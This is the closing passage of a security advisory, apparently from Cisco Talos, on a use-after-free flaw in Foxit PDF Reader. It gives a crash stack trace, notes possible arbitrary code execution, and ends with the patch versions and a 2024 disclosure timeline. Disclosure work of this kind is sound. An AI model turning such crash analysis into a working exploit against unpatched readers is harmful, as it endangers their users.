10 076fe25c 034371d9     18a7eb6d 3d251e0d 3d251e61 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1419
11 076fe288 03435860     18a7eb6d 292c21b1 3d251e0d FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1419
12 076fe2a0 03435689     00000000 00000000 00000002 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39faa0
13 076fe2cc 030d1f4e     15bb20a0 292c2339 3d251e0d FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39f8c9
14 076fe3dc 030d1a42     076fe570 15bb20a0 076fe438 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3c18e
15 076fe464 030ba744     076fe570 15bb20a0 15b8b5e4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3bc82
16 076fe614 030ba240     076fe6b0 15b8b60c 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24984
17 076fe628 03093c5f     076fe6b0 15b8b60c 175d8a7a FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24480
18 076fe6a0 03094596     15b8b5e4 0f961790 15b8b5d0 FoxitPDFReader!FXJSE_Runtime_Release+0xeaf
19 076fe6dc 02c38af7     15f38f70 18bb03bc 0f961790 FoxitPDFReader!FXJSE_ExecuteScript+0x86
1a 076fe794 02c3a129     00000000 076fe824 076fe7cc FoxitPDFReader!safe_vsnprintf+0x10ddcc7
1b 076fe7ac 00f720df     076fe824 076fe7cc 175d8b06 FoxitPDFReader!safe_vsnprintf+0x10df2f9
1c 076fe7dc 00f70fa4     15f3fb88 00000015 076fe804 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c69cf
1d 076fe81c 00f6f9d0     15932710 1035b720 1642d940 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c5894
1e 076fe870 0085d322     076fe8a0 1035b720 1642d940 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c42c0
1f 076fe8c0 00ad901b     00000000 175d983e 7fffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x8852
20 076ff4e4 04079713     00000000 00000000 175d996e FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x6194b
21 076ff5b4 0407a8ec     00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x199cc3
22 076ff5d8 04075292     00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x19ae9c
23 076ff64c 04075b05     103652e8 000502f4 00000429 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x195842
24 076ff66c 75a412bb     000502f4 00000429 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1960b5
25 076ff698 75a37a5a     04075ad1 000502f4 00000429 USER32!AddClipboardFormatListener+0x4b
26 076ff780 75a36391     04075ad1 00000000 00000429 USER32!GetClassLongW+0x7aa
27 076ff7fc 75a35eb0     00000329 076ff824 00a5f324 USER32!DispatchMessageW+0x4f1
28 076ff808 00a5f324     0c6a8c60 0c6a8c60 05b998e8 USER32!DispatchMessageW+0x10
29 076ff824 00a5f3e3     05b998e8 00a5f350 ffffffff FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1dfe74
2a 076ff844 044a29c2     00000000 05bc550c 075da000 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1dff33
2b 076ff85c 0425cef1     00610000 00000000 0c6453c4 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x5c2f72
2c 076ff8a8 76a5fcc9     075da000 76a5fcb0 076ff914 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x37d4a1
2d 076ff8b8 77b87c5e     075da000 336677e2 00000000 KERNEL32!BaseThreadInitThunk+0x19
2e 076ff914 77b87c2e     ffffffff 77ba8c16 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0x11e
2f 076ff924 00000000     0425cfc0 075da000 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0xee

At [10] above, we can observe ecx contains the same memory pointer, which belongs to a freed allocation. Note that the vulnerable buffer is reused as a bytestring object. The value at the offset 0xC of the vulnerable buffer is passed as a this pointer to a method at (11). The crash occurs at (12) when this pointer is dereferenced whithout any validation. Depending on the memory layout of the process, it may be possible to do arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution.

VENDOR RESPONSE

Fixed in Foxit PDF Reader/Editor v2024.3 and Foxit PDF Editor v13.1.4

TIMELINE

2024-04-11 - Vendor Disclosure
2024-09-26 - Vendor Patch Release
2024-10-02 - Public Release

Credit

Discovered by KPC of Cisco Talos.